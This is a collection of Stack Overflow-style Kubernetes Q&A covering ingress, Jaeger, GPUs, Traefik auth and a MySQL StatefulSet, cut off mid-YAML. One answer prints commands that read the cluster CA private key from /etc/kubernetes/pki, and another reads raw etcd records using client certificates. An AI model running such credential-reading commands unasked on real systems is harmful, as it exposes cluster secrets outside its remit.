Is it possible to use Windows Server Containers OS in Google Kubernetes Engine?</p>
<p>I see Windows Server Containers OS is available in Compute Engine and seems that Kubernetes support is <a href="https://kubernetes.io/blog/2018/01/kubernetes-v19-beta-windows-support/" rel="noreferrer">available</a> for Windows.</p>
| <p>It is possible to run Windows containers, but only as a container in a Compute Engine VM instance.
I would refer you to <a href="https://cloud.google.com/blog/products/gcp/how-to-run-windows-containers-on-compute-engine" rel="nofollow noreferrer">this article</a> in the GCP blog. Please be aware that there a few <a href="https://cloud.google.com/compute/docs/containers/#windows_known_issues" rel="nofollow noreferrer">known issues</a> that you should read before deploying Windows containers in Windows VM instances. </p>
<p>For GKE, there is currently a <a href="https://issuetracker.google.com/110213558" rel="nofollow noreferrer">Feature Request</a>. Other customers have asked to include future support for Windows containers in GKE. This is a request through official means. Google will consider the need based on its feasibility, or the number of customers who ask for it, but they can't guarantee an implementation or provide you with an ETA for it.</p>
|
<p>I want to create Kubernetes cluster with Terraform,</p>
<p>Regarding the doc page here: <a href="https://www.terraform.io/docs/providers/alicloud/r/cs_managed_kubernetes.html" rel="nofollow noreferrer">https://www.terraform.io/docs/providers/alicloud/r/cs_managed_kubernetes.html</a></p>
<pre><code>variable "name" {
default = "my-first-k8s"
}
data "alicloud_zones" main {
available_resource_creation = "VSwitch"
}
data "alicloud_instance_types" "default" {
availability_zone = "${data.alicloud_zones.main.zones.0.id}"
cpu_core_count = 1
memory_size = 2
}
</code></pre>
<p>Where do I insert vswitch id? and how to set the region id?</p>
| <p>You can insert the vswitch id in the <code>resource</code> definition:</p>
<pre><code>resource "alicloud_cs_managed_kubernetes" "k8s" {
name = "${var.name}"
availability_zone = "${data.alicloud_zones.main.zones.0.id}"
new_nat_gateway = true
worker_instance_types = ["${data.alicloud_instance_types.default.instance_types.0.id}"]
worker_numbers = [2]
password = "Test12345"
pod_cidr = "172.20.0.0/16"
service_cidr = "172.21.0.0/20"
install_cloud_monitor = true
worker_disk_category = "cloud_efficiency"
vswitch_ids = ["your-alibaba-vswitch-id"]
}
</code></pre>
<p>For the zones (if you want to override the defaults) based on <a href="https://github.com/terraform-providers/terraform-provider-alicloud/blob/master/alicloud/data_source_alicloud_zones.go#L83" rel="nofollow noreferrer">this</a> and the <a href="https://www.terraform.io/docs/providers/alicloud/d/zones.html" rel="nofollow noreferrer">docs</a>, you need to do something like this:</p>
<pre><code>data "alicloud_zones" main {
available_resource_creation = "VSwitch"
zones = [
{
id = "..."
local_name = "..."
...
},
{
id = "..."
local_name = "..."
...
},
...
]
}
</code></pre>
|
<p>I have a kubernetes cluster on google cloud platform, and on it, I have a jaeger deployment via development setup of <a href="https://github.com/jaegertracing/jaeger-kubernetes#development-setup" rel="nofollow noreferrer">jaeger-kubernetes templates</a>
because my purpose is to set up <code>elasticsearch</code> as the backend storage. Due to this, I followed the jaeger-kubernetes GitHub documentation with the following actions:</p>
<ul>
<li>I've created the services via <a href="https://github.com/jaegertracing/jaeger-kubernetes#production-setup" rel="nofollow noreferrer">production setup</a> options</li>
</ul>
<p>Here the URLs used to access the <code>elasticsearch</code> server are configured, along with the username, password and ports:</p>
<pre><code>kubectl create -f https://raw.githubusercontent.com/jaegertracing/jaeger-kubernetes/master/production-elasticsearch/configmap.yml
</code></pre>
<p>And here the download of the docker images for the elasticsearch service and their volume mounts are configured. </p>
<pre><code>kubectl create -f https://raw.githubusercontent.com/jaegertracing/jaeger-kubernetes/master/production-elasticsearch/elasticsearch.yml
</code></pre>
<p>And then, at this moment, we have an elasticsearch service running on ports 9200 and 9300:</p>
<pre><code> kubectl get service elasticsearch [a89fbe2]
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
elasticsearch ClusterIP None <none> 9200/TCP,9300/TCP 1h
</code></pre>
<ul>
<li>I've followed with the creation of the jaeger components using the <code>kubernetes-jaeger</code> <a href="https://github.com/jaegertracing/jaeger-kubernetes#jaeger-components" rel="nofollow noreferrer">production templates</a> in this way:</li>
</ul>
<hr>
<pre><code>λ bgarcial [~] → kubectl create -f https://raw.githubusercontent.com/jaegertracing/jaeger-kubernetes/master/jaeger-production-template.yml
deployment.extensions/jaeger-collector created
service/jaeger-collector created
service/zipkin created
deployment.extensions/jaeger-query created
service/jaeger-query created
daemonset.extensions/jaeger-agent created
λ bgarcial [~/workspace/jaeger-elastic] at master ?
</code></pre>
<p>According to the <a href="https://eng.uber.com/wp-content/uploads/2017/02/Distributed_Tracing_Header.png" rel="nofollow noreferrer">Jaeger architecture</a>, the <code>jaeger-collector</code> and <code>jaeger-query</code> services require access to backend storage. </p>
<p>And so, these are my services running on my kubernetes cluster:</p>
<pre><code>λ bgarcial [~/workspace/jaeger-elastic] at master ?
→ kubectl get services [baefdf9]
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
elasticsearch ClusterIP None <none> 9200/TCP,9300/TCP 3h
jaeger-collector ClusterIP 10.55.253.240 <none> 14267/TCP,14268/TCP,9411/TCP 3h
jaeger-query LoadBalancer 10.55.248.243 35.228.179.167 80:30398/TCP 3h
kubernetes ClusterIP 10.55.240.1 <none> 443/TCP 3h
zipkin ClusterIP 10.55.240.60 <none> 9411/TCP 3h
λ bgarcial [~/workspace/jaeger-elastic] at master ?
</code></pre>
<ul>
<li>I go to the elasticsearch <code>configmap.yml</code> file via the <code>kubectl edit configmap jaeger-configuration</code> command in order to try to edit it in relation to the elasticsearch URL endpoints (maybe? ... At this moment I am supposing that this is the next step ...)</li>
</ul>
<p>I execute it:</p>
<pre><code>λ bgarcial [~] → kubectl edit configmap jaeger-configuration
</code></pre>
<p>And I get the following edit entry:</p>
<pre><code> apiVersion: v1
data:
agent: |
collector:
host-port: "jaeger-collector:14267"
collector: |
es:
server-urls: http://elasticsearch:9200
username: elastic
password: changeme
collector:
zipkin:
http-port: 9411
query: |
es:
server-urls: http://elasticsearch:9200
username: elastic
password: changeme
span-storage-type: elasticsearch
kind: ConfigMap
metadata:
creationTimestamp: "2018-12-27T13:24:11Z"
labels:
app: jaeger
jaeger-infra: configuration
name: jaeger-configuration
namespace: default
resourceVersion: "1387"
selfLink: /api/v1/namespaces/default/configmaps/jaeger-configuration
uid: b28eb5f4-09da-11e9-9f1e-42010aa60002
</code></pre>
<p>Here ... do I need to set up our own URLs for the collector and query services, which will connect with the elasticsearch backend service?</p>
<p>How can I set up the elasticsearch IP address or URLs here?</p>
<p>Among the jaeger components, the query and collector need access to storage, but I don't know what the elastic endpoint is ... </p>
<p>Is <code>server-urls: http://elasticsearch:9200</code> a correct endpoint?</p>
<p>I am just starting in the Kubernetes and DevOps world, and I would appreciate it if someone could help me with the concepts and point me in the right direction in order to set up jaeger and elasticsearch as backend storage.</p>
| <p>When you are accessing the service from the pod in the <strong>same namespace</strong> you can use just the service name.
Example:</p>
<pre><code>http://elasticsearch:9200
</code></pre>
<p>If you are accessing the service from the pod in the <strong>different namespace</strong> you should also specify the namespace.
Example: </p>
<pre><code>http://elasticsearch.mynamespace:9200
http://elasticsearch.mynamespace.svc.cluster.local:9200
</code></pre>
<p>To check in what namespace the service is located, use the following command:</p>
<pre><code>kubectl get svc --all-namespaces -o wide
</code></pre>
<p><strong>Note</strong>: Changing a ConfigMap does not apply it to the deployment instantly. Usually, you need to restart all pods in the deployment to apply the new ConfigMap values. There is no rolling-restart functionality at the moment, but you can use the following command as a workaround:<br>
<em>(replace the deployment name and the container name with the real ones)</em></p>
<pre><code>kubectl patch deployment mydeployment -p '{"spec":{"template":{"spec":{"containers":[{"name":"my-pod-name","env":[{"name":"START_TIME","value":"'$(date +%s)'"}]}]}}}}'
</code></pre>
|
| <p>I want to optimally configure the CPU cores without over- or under-allocation. How can I measure the required CPU millicores for a given container? It also brings up the question of how much traffic a proxy will send to any given pod based on CPU consumption so we can optimally use the compute.</p>
<p>Currently I send requests and monitor with,</p>
<pre><code>kubectl top pod
</code></pre>
<p>Is there any tool that can measure requests, CPU and memory over time and suggest an optimal CPU recommendation for the pods?</p>
| <p>Monitoring over time and per Pod yes, there's suggestions at <a href="https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/" rel="nofollow noreferrer">https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/</a> One of the more popular is the Prometheus-Grafana combination - <a href="https://grafana.com/dashboards/315" rel="nofollow noreferrer">https://grafana.com/dashboards/315</a></p>
<p>As for automatic suggestion of the request and limits, I don't think there is anything. Keep in mind Kubernetes already tries to balance giving each Pod what it needs without it taking too much. The limits and requests that you set are to help it do this more safely. There are limits to automatic inference, as an under-resourced Pod can still work but respond a bit slower - it is up to you to decide what level of slowness you would tolerate. It is also up to you to decide what level of resource consumption could be acceptable in peak load, as opposed to excessive consumption that might indicate a bug in your app or even an attack. There's a further limitation as the metric units are themselves an attempt to approximate resource power that can actually vary with types of hardware (memory and CPUs can differ in mode of operation as well as quantity) and so can vary across clusters or even nodes on a cluster if the hardware isn't all equal. </p>
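<p>For reference, whatever numbers you settle on end up in the container's resources stanza — a minimal sketch with placeholder values to tune from your own measurements:</p>

<pre><code>resources:
  requests:
    cpu: 100m
    memory: 128Mi
  limits:
    cpu: 500m
    memory: 256Mi
</code></pre>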
<p>What you are doing with top seems to me a good way to get started. You'll want to monitor resource usage for the cluster anyway so keeping track of this and adjusting limits as you go is a good idea. If you can run the same app outside of kubernetes and read around to see what other apps using the same language do then that can help to indicate if there's anything you can do to improve utilisation (memory consumption on the JVM in containers for example famously requires some tweaking to get right). </p>
|
<p>I created ConfigMap using kubectl and I can also see it using:</p>
<pre><code>kubectl get cm
</code></pre>
<p>I am just curious where Kubernetes stores this data/information within the cluster. Does it store it in etcd? How do I view it, if it is stored in etcd?</p>
<p>Does it store it in any file/folder location or anywhere else?</p>
<p>I mean, where does Kubernetes store it internally?</p>
| <p>Yes etcd is used for storing ConfigMaps and other resources you deploy to the cluster. See <a href="https://matthewpalmer.net/kubernetes-app-developer/articles/how-does-kubernetes-use-etcd.html" rel="noreferrer">https://matthewpalmer.net/kubernetes-app-developer/articles/how-does-kubernetes-use-etcd.html</a> and note <a href="https://github.com/kubernetes/kubernetes/issues/19781#issuecomment-172553264" rel="noreferrer">https://github.com/kubernetes/kubernetes/issues/19781#issuecomment-172553264</a> </p>
<p>You view the content of the configmap with 'kubectl get cm -oyaml' i.e. through the k8s API directly as illustrated in <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/" rel="noreferrer">https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/</a> You don't need to look inside etcd to see the content of a configmap. </p>
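<p>If you really do want to look at the raw record in etcd, something along these lines works from an etcd member (the cert paths here are kubeadm defaults and may differ in your setup); note the value is stored in a binary protobuf format, so kubectl remains the friendlier view:</p>

<pre><code>ETCDCTL_API=3 etcdctl \
  --endpoints=https://127.0.0.1:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get /registry/configmaps/default/my-configmap
</code></pre>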
|
<p>In Kubernetes, what are the advantages and disadvantages of using a single shared PVC for all pods versus a separate PVC for each pod?</p>
| <p><code>StatefulSet with a single PV/PVC</code> and <code>StatefulSet with multiple PV/PVCs</code> have different use cases and should be used according to the application you want to deploy. You cannot prefer one over the other in general.</p>
<p>Let me explain with the example of databases. If you want to deploy a <code>relational database</code> like <code>postgresql</code>, all the data is stored in one place. You need a StatefulSet with a single PV/PVC, and all replicas write to that particular volume only. This is the only way to keep the data consistent in postgresql.</p>
<p>Now let's say you want to deploy a <code>distributed nosql database</code> like <code>cassandra/mongodb</code>, where the data is split across the different machines of the database cluster. In such databases, data is replicated over different nodes, and in that case each StatefulSet pod acts as a different node of that database. So, such pods need different volumes to store their data. Hence, if you're running a cassandra StatefulSet with 3 pods, those pods must have different PV/PVCs attached to them. Each node writes data to its own PV, and the data is ultimately replicated to the other nodes.</p>
|
<p>I have a new kubernetes cluster, I installed Traefik v1.7.6 on it and enabled Traefik dashboard which is working fine.</p>
<p>Now I want to add basic auth on the ingress service of traefik dashboard, I followed <a href="https://docs.traefik.io/user-guide/kubernetes/#basic-authentication" rel="nofollow noreferrer">docs</a> : </p>
<ul>
<li>created a secret called <code>auth-traefik</code> from htpasswd generated file in same namespace as Traefik</li>
<li><p>added following annotations to ingress dashboard:</p>
<pre><code>kubernetes.io/ingress.class: traefik
traefik.ingress.kubernetes.io/auth-secret: auth-traefik
traefik.ingress.kubernetes.io/auth-type: basic
</code></pre></li>
</ul>
<p>I can't access the dashboard anymore and got the following page: <code>502 Bad Gateway nginx/1.13.12</code></p>
<p>I restarted traefik pod and there is the following log : </p>
<pre><code>*{"level":"error","msg":"Failed to retrieve auth configuration for ingress kube-system/traefik-dashboard: failed to load auth credentials: secret \"kube-system\"/\"auth-traefik\" not found","time":"2018-12-26T23:45:59Z"}*
</code></pre>
<p>More details: Ubuntu 18.04 running on a x64 <a href="https://www.scaleway.com" rel="nofollow noreferrer">Scaleway</a> server. I tried a regular & MicroK8s installation, both have the same issue (I'm going on with the MicroK8s one, for now).</p>
<p>Traefik was installed through the latest Helm package (with default values, I only enabled the dashboard)</p>
| <p>Looks like you might have created the <code>auth-traefik</code> Kubernetes secret on a different namespace from <code>kube-system</code> where it's looking for it. (Looks like the <code>Ingress</code> is defined in the <code>kube-system</code> namespace).</p>
<p>You can check with:</p>
<pre><code>$ kubectl -n kube-system get secret auth-traefik -o=yaml
</code></pre>
<p>If it's not there (is it in a different namespace? monitoring? default?), then you can create it:</p>
<pre><code>$ kubectl create secret generic auth-traefik --from-file auth --namespace=kube-system
</code></pre>
<p>Or the <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/" rel="nofollow noreferrer">ServiceAccount</a> that your Traefik pod is using doesn't have <a href="https://kubernetes.io/docs/reference/access-authn-authz/rbac/" rel="nofollow noreferrer">RBAC</a> access to the <a href="https://kubernetes.io/docs/concepts/configuration/secret/" rel="nofollow noreferrer">Secrets</a> resource in the <code>kube-system</code> namespace.</p>
|
<p>I am not able to curl/wget any URL with https. They're all giving connection refused errors. Here's what I've observed so far:</p>
<ol>
<li><p>When I curl any URL with https from any pod, the domain gets resolved to a different IP address than the intended one. I verified this with <code>dig domainname</code> and by <code>curl</code>ing the same domainname. The two IPs were different.</p></li>
<li><p>For debugging purpose, I tried the same scenario from a kubelet docker container and it worked. But if I tried the same from another app container, it fails.</p></li>
</ol>
<p>Any idea what might be wrong? I am sure, there is some issue with networking. Any more steps for debugging?</p>
<p>The cluster is setup with RKE on bare-metal which uses canal for networking.</p>
<p>The website I am trying to curl is updates.jenkins.io and here's the nslookup output</p>
<pre><code>bash-4.4# nslookup updates.jenkins.io
Server: 10.43.0.10
Address: 10.43.0.10#53
Non-authoritative answer:
updates.jenkins.io.domain.name canonical name = io.domain.name.
Name: io.domain.name
Address: 185.82.212.199
</code></pre>
<p>And nslookup from the node gives</p>
<pre><code>root@n4:/home# nslookup updates.jenkins.io
Server: 127.0.1.1
Address: 127.0.1.1#53
Non-authoritative answer:
updates.jenkins.io canonical name = mirrors.jenkins.io.
Name: mirrors.jenkins.io
Address: 52.202.51.185
</code></pre>
<p>As far as I can see, it is trying to connect to io.domain.name and not updates.jenkins.io.</p>
<p>On further inspection, all domains ending with .io are causing the issue. Here's another one:</p>
<pre><code>bash-4.4# nslookup test.io
Server: 10.43.0.10
Address: 10.43.0.10#53
Non-authoritative answer:
test.io.domain.name canonical name = io.domain.name.
Name: io.domain.name
Address: 185.82.212.199
</code></pre>
| <p>Well, there was some issue with <code>/etc/resolv.conf</code>. It was missing the correct nameserver entry. Once that was resolved, and the system components were restarted, everything was working.</p>
|
<p>I have something like this:</p>
<pre><code> POD-1
|
-------------------------
?|? ?|? ?|?
service-1 service-2 service-3
</code></pre>
<p>How do I communicate from a server inside a pod, to other servers in pods behind services?</p>
| <p>You need to have services for the pods that you want to access. You can then just use the internal endpoint of the corresponding service of each pod. </p>
<p>As an example, let's say there is a <code>mysql</code> pod and a corresponding service <code>mysql-svc</code> of type ClusterIP exposing port 3306, as below. </p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: mysql-svc
spec:
ports:
- name: db-port
protocol: "TCP"
port: 3306
targetPort: 3306
selector:
app: mysql
</code></pre>
<p>And there is a separate pod with a python application which uses that mysql. You can access that mysql server from inside the pod using <code>mysql://mysql-svc:3306/dbName</code>, which is the internal endpoint of <code>mysql-svc</code>.</p>
<p>And if your pods are in two different namespaces (mysql in <code>dev</code> namespace and python app in <code>qa</code> namespace) you can use <code>mysql-svc.dev.svc.cluster.local</code> instead.</p>
|
<p>I created my docker image (python flask).</p>
<p>How can I calculate what limits to put for memory and CPU?</p>
<p>Do we have some tools that run performance tests on docker with different limits and then advise what the best limit values to put are?</p>
| <p>With an application already running inside of a container, you can use <code>docker stats</code> to see the current utilization of CPU and memory. While there it little harm in setting CPU limits too low (it will just slow down the app, but it will still run), be careful to keep memory limits above the worst case scenario. When apps attempt to exceed their memory limit, they will be killed and usually restarted by a restart policy/orchestration tool. If the limit is set too low, you may find your app in a restart loop.</p>
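<p>As a small sketch (the container and image names are placeholders), the observation and the limits look like this on plain docker:</p>

<pre><code>$ docker stats mycontainer                      # watch live CPU / memory usage
$ docker run --cpus=0.5 --memory=256m myimage   # then run with limits based on what you observed
</code></pre>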
|
<p>Here is a sample WebSocket app that I'm trying to get to work behind a Kubernetes ingress-nginx controller.</p>
<p>Kubernetes yaml:</p>
<pre><code>echo "
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: ws-example
spec:
replicas: 1
template:
metadata:
labels:
app: wseg
spec:
containers:
- name: websocketexample
image: nicksardo/websocketexample
imagePullPolicy: Always
ports:
- name: http
containerPort: 8080
env:
- name: podname
valueFrom:
fieldRef:
fieldPath: metadata.name
---
apiVersion: v1
kind: Service
metadata:
name: ws-example-svc
labels:
app: wseg
spec:
type: NodePort
ports:
- port: 80
targetPort: 8080
protocol: TCP
selector:
app: wseg
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: ws-example-svc
annotations:
kubernetes.io/ingress.class: nginx
nginx.ingress.kubernetes.io/rewrite-target: /
spec:
rules:
- host: myhostname.com
http:
paths:
- backend:
serviceName: ws-example-svc
servicePort: 80
path: /somecontext
" | kubectl create -f -
</code></pre>
<p>I get this error:</p>
<pre><code>WebSocket connection to 'ws://myhostname.com/somecontext/ws?encoding=text' failed: Error during WebSocket handshake: Unexpected response code: 400
</code></pre>
<p>When I try to connect using a WebSocket client web page like this <a href="http://www.websocket.org/echo.html" rel="noreferrer">http://www.websocket.org/echo.html</a></p>
<p>The version of ingress-nginx is 0.14.0. This version supports WebSockets.</p>
<hr>
<p>Update: I'm able to directly access the pod running the websocket server when I port-forward from my localhost to the pod's port.</p>
<pre><code>[rpalaniappan@sdgl15280a331:~/git/zalenium] $ kubectl get pods -l app=wseg
NAME READY STATUS RESTARTS AGE
ws-example-5dddb98cfb-vmdt5 1/1 Running 0 5h
[rpalaniappan@sdgl15280a331:~/git/zalenium] $ kubectl port-forward ws-example-5dddb98cfb-vmdt5 8080:8080
Forwarding from 127.0.0.1:8080 -> 8080
Forwarding from [::1]:8080 -> 8080
Handling connection for 8080
</code></pre>
<hr>
<pre><code>[rpalaniappan@sdgl15280a331:~/git/zalenium] $ wscat -c ws://localhost:8080/ws
connected (press CTRL+C to quit)
< Connected to ws-example-5dddb98cfb-vmdt5
> hi
< hi
< ws-example-5dddb98cfb-vmdt5 reports time: 2018-12-28 01:19:00.788098266 +0000 UTC
</code></pre>
| <p>So basically this:</p>
<pre><code>nginx.ingress.kubernetes.io/rewrite-target: /
</code></pre>
<p>is stripping the <code>/ws</code> from the request (combined with the <code>path</code> you set) that gets sent to the backend every time your browser tries to issue a WebSocket connection request. The backend expects <code>/ws</code> when it receives a connection request.</p>
<p>If you specify <code>path: /mypath</code> and <code>/mypath/*</code> it works (works for me):</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: ws-example-svc
annotations:
kubernetes.io/ingress.class: nginx
nginx.ingress.kubernetes.io/rewrite-target: /
spec:
rules:
- host: myhostname.com
http:
paths:
- backend:
serviceName: ws-example-svc
servicePort: 80
path: /mypath
- backend:
serviceName: ws-example-svc
servicePort: 80
path: /mypath/*
</code></pre>
|
<p>export K8s cluster CA cert and CA private key</p>
<p>Team, I have a Kubernetes cluster running. I will be deleting and creating it again and again so I want to reuse the same CA cert all the time for which I need to save the CA cert and key to create secret as below </p>
<pre><code>create secret keypair ca --cert ${CACRT} --key ${CAKEY} --name ${NAME}
</code></pre>
<p>I need the path to the cert and key, and also the kops command to export them.</p>
| <p>I'm not really sure what you are trying to accomplish with the <code>create secret keypair ca...</code> command, but you can get these right out of one of the Kubernetes masters (or master if you have one).</p>
<pre><code>$ ssh user@kubernetesmaster
</code></pre>
<p>Then:</p>
<pre><code>$ cat /etc/kubernetes/pki/ca.crt
...
$ cat /etc/kubernetes/pki/ca.key
</code></pre>
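<p>To copy them off the master so they can be reused later, something like:</p>

<pre><code>$ scp user@kubernetesmaster:/etc/kubernetes/pki/ca.crt .
$ scp user@kubernetesmaster:/etc/kubernetes/pki/ca.key .
</code></pre>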
<p>Note that <code>etcd</code> usually uses a different CA. You can find it under:</p>
<pre><code>/etc/kubernetes/pki/etcd
</code></pre>
|
<p>I’m trying to schedule GPUs in Kubernetes v1.13.1, and I followed the guide at <a href="https://kubernetes.io/docs/tasks/manage-gpus/scheduling-gpus/#deploying-nvidia-gpu-device-plugin" rel="nofollow noreferrer">https://kubernetes.io/docs/tasks/manage-gpus/scheduling-gpus/#deploying-nvidia-gpu-device-plugin</a></p>
<p>But the gpu resources don't show up when I run
<code>kubectl get nodes -o yaml</code>. Following <a href="https://stackoverflow.com/questions/49812783/scheduling-gpus-in-kubernetes-1-10">this post</a>, I checked the Nvidia gpu device plugin.</p>
<p>I run:</p>
<pre><code>kubectl create -f https://raw.githubusercontent.com/NVIDIA/k8s-device-plugin/v1.11/nvidia-device-plugin.yml
</code></pre>
<p>several times and the result is </p>
<pre><code>Error from server (AlreadyExists): error when creating "https://raw.githubusercontent.com/NVIDIA/k8s-device-plugin/v1.11/nvidia-device-plugin.yml": daemonsets.extensions "nvidia-device-plugin-daemonset" already exists
</code></pre>
<p>It seems that I have installed the NVIDIA Device Plugin? But the result of <code>kubectl get pods --all-namespaces</code> is </p>
<pre><code>NAMESPACE NAME READY STATUS RESTARTS AGE
kube-system calico-node-qdhvd 2/2 Running 0 65m
kube-system coredns-78d4cf999f-fk4wl 1/1 Running 0 68m
kube-system coredns-78d4cf999f-zgfvl 1/1 Running 0 68m
kube-system etcd-liuqin01 1/1 Running 0 67m
kube-system kube-apiserver-liuqin01 1/1 Running 0 67m
kube-system kube-controller-manager-liuqin01 1/1 Running 0 67m
kube-system kube-proxy-l8p9p 1/1 Running 0 68m
kube-system kube-scheduler-liuqin01 1/1 Running 0 67m
</code></pre>
<p>When I run <code>kubectl describe node</code>, gpu is not in the the allocatable resource</p>
<pre><code>Non-terminated Pods: (9 in total)
Namespace Name CPU Requests CPU Limits Memory Requests Memory Limits AGE
--------- ---- ----------- - ---------- --------------- ------------- ---
kube-system calico-node-qdhvd 250m (2%) 0 (0%) 0 (0%) 0 (0%) 18h
kube-system coredns-78d4cf999f-fk4wl 100m (0%) 0 (0%) 70Mi (0%) 170Mi (1%) 19h
kube-system coredns-78d4cf999f-zgfvl 100m (0%) 0 (0%) 70Mi (0%) 170Mi (1%) 19h
kube-system etcd-liuqin01 0 (0%) 0 (0%) 0 (0%) 0 (0%) 19h
kube-system kube-apiserver-liuqin01 250m (2%) 0 (0%) 0 (0%) 0 (0%) 19h
kube-system kube-controller-manager-liuqin01 200m (1%) 0 (0%) 0 (0%) 0 (0%) 19h
kube-system kube-proxy-l8p9p 0 (0%) 0 (0%) 0 (0%) 0 (0%) 19h
kube-system kube-scheduler-liuqin01 100m (0%) 0 (0%) 0 (0%) 0 (0%) 19h
kube-system nvidia-device-plugin-daemonset-p78wz 0 (0%) 0 (0%) 0 (0%) 0 (0%) 26m
Allocated resources:
(Total limits may be over 100 percent, i.e., overcommitted.)
Resource Requests Limits
-------- -------- ------
cpu 1 (8%) 0 (0%)
memory 140Mi (0%) 340Mi (2%)
ephemeral-storage 0 (0%) 0 (0%)
</code></pre>
| <p>As <a href="https://stackoverflow.com/users/5850603/lianyoucat">lianyouCat</a> mentioned in the comments:</p>
<blockquote>
<p>After installing nvidia-docker2, the default runtime of docker should be modified to nvidia docker as <a href="https://github.com/NVIDIA/k8s-device-plugin#preparing-your-gpu-nodes" rel="nofollow noreferrer">github.com/NVIDIA/k8s-device-plugin#preparing-your-gpu-nodes</a>.</p>
<p>After modifying the <code>/etc/docker/daemon.json</code>, you need to restart docker so that the configuration works.</p>
</blockquote>
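<p>For reference, the <code>/etc/docker/daemon.json</code> change described in that README looks roughly like this (verify it against the linked guide for your nvidia-docker2 version), followed by a Docker restart such as <code>sudo systemctl restart docker</code>:</p>
<pre><code>{
    "default-runtime": "nvidia",
    "runtimes": {
        "nvidia": {
            "path": "/usr/bin/nvidia-container-runtime",
            "runtimeArgs": []
        }
    }
}
</code></pre>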
|
<p>I have added a security context in my pod which looks as follows:</p>
<pre><code>spec:
securityContext:
runAsNonRoot: true
</code></pre>
<p>While running the pod I am getting error message (kubectl get pod pod-name -o=yaml):</p>
<blockquote>
<p>container has runAsNonRoot and image has non-numeric user (default),
cannot verify user is non-root</p>
</blockquote>
<p>The message is intuitive, but after reading this <a href="https://kubernetes.io/blog/2016/08/security-best-practices-kubernetes-deployment/" rel="noreferrer">kubernetes blog</a> it seems to me it should be very straightforward. What am I missing here?</p>
| <p>This error occurs when the container's UID is not set to a numeric value, so Kubernetes cannot verify that it is non-root. Based on the error text, we need to set a numeric user value.</p>
<p>So, for the user with UID=1000 you can do it in your pod definition like:</p>
<pre><code>securityContext:
runAsUser: 1000
</code></pre>
<p>So your <code>securityContext</code> should be like:</p>
<pre><code>securityContext:
fsGroup: 2000
runAsNonRoot: true
runAsUser: 1000
</code></pre>
<p>Checkout it in official docs <a href="https://kubernetes.io/docs/tasks/configure-pod-container/security-context/#set-the-security-context-for-a-pod" rel="noreferrer">here</a></p>
|
<p>I followed the example in here <a href="https://kubernetes.io/docs/tasks/run-application/run-replicated-stateful-application/" rel="noreferrer">https://kubernetes.io/docs/tasks/run-application/run-replicated-stateful-application/</a> to create a 3 replica mysql statefulset in kubernetes and everything works fine.</p>
<p>However, after I added a root password and modified the deployment yaml to include the password, mysql-1 always fails.</p>
<p>Here is how I add the password:</p>
<ol>
<li>I create a secret <code>mysql-root-pass</code></li>
<li>I remove the <code>MYSQL_ALLOW_EMPTY_PASSWORD</code> and replace it with <code>MYSQL_ROOT_PASSWORD</code> read from the secret</li>
<li>Add <code>-p$MYSQL_ROOT_PASSWORD</code> to everywhere mysql is called in the yaml file.</li>
<li>Still, mysql-0 is created and runs, but mysql-1 crashed:</li>
</ol>
<p><code>mysql-1 0/2 Init:CrashLoopBackOff</code></p>
<p>Anyone has a working example on how to add password?</p>
<h2>Edit: Add yaml file</h2>
<pre><code>apiVersion: apps/v1
kind: StatefulSet
metadata:
name: mysql
labels:
app: mysql
spec:
selector:
matchLabels:
app: mysql
serviceName: mysql
replicas: 3
template:
metadata:
labels:
app: mysql
spec:
initContainers:
- name: init-mysql
image: mysql:5.7
command:
# initContainer is used to setup config according to config-map
- bash
- "-c"
- |
set -ex
# Generate mysql server-id from pod ordinal index.
[[ `hostname` =~ -([0-9]+)$ ]] || exit 1
ordinal=${BASH_REMATCH[1]}
echo [mysqld] > /mnt/conf.d/server-id.cnf
# Add an offset to avoid reserved server-id=0 value.
echo server-id=$((100 + $ordinal)) >> /mnt/conf.d/server-id.cnf
# Copy appropriate conf.d files from config-map to emptyDir.
if [[ $ordinal -eq 0 ]]; then
cp /mnt/config-map/master.cnf /mnt/conf.d/
else
cp /mnt/config-map/slave.cnf /mnt/conf.d/
fi
volumeMounts:
- name: conf
mountPath: /mnt/conf.d
- name: config-map
mountPath: /mnt/config-map
- name: clone-mysql
image: gcr.io/google-samples/xtrabackup:1.0
command:
- bash
- "-c"
- |
set -ex
# Skip the clone if data already exists.
[[ -d /var/lib/mysql/mysql ]] && exit 0
# Skip the clone on master (ordinal index 0).
[[ `hostname` =~ -([0-9]+)$ ]] || exit 1
ordinal=${BASH_REMATCH[1]}
[[ $ordinal -eq 0 ]] && exit 0
# Clone data from previous peer.
ncat --recv-only mysql-$(($ordinal-1)).mysql 3307 | xbstream -x -C /var/lib/mysql
# Prepare the backup.
xtrabackup --prepare --user=root --password=$MYSQL_ROOT_PASSWORD --target-dir=/var/lib/mysql
volumeMounts:
- name: data
mountPath: /var/lib/mysql
subPath: mysql
- name: conf
mountPath: /etc/mysql/conf.d
containers:
- name: mysql
image: mysql:5.7
env:
- name: MYSQL_ROOT_PASSWORD
valueFrom:
secretKeyRef:
name: mysql-root-pass
key: password
ports:
- name: mysql
containerPort: 3306
volumeMounts:
- name: data
mountPath: /var/lib/mysql
subPath: mysql
- name: conf
mountPath: /etc/mysql/conf.d
resources:
requests:
cpu: 500m
memory: 1Gi
livenessProbe:
exec:
command:
- bash
- "-c"
- |
set -ex
mysqladmin -p$MYSQL_ROOT_PASSWORD ping &> /dev/null
initialDelaySeconds: 30
periodSeconds: 10
timeoutSeconds: 5
readinessProbe:
exec:
# Check we can execute queries over TCP (skip-networking is off).
command:
- bash
- "-c"
- |
set -ex
mysql -h 127.0.0.1 -p$MYSQL_ROOT_PASSWORD -e "SELECT 1" &> /dev/null
initialDelaySeconds: 5
periodSeconds: 2
timeoutSeconds: 1
- name: xtrabackup
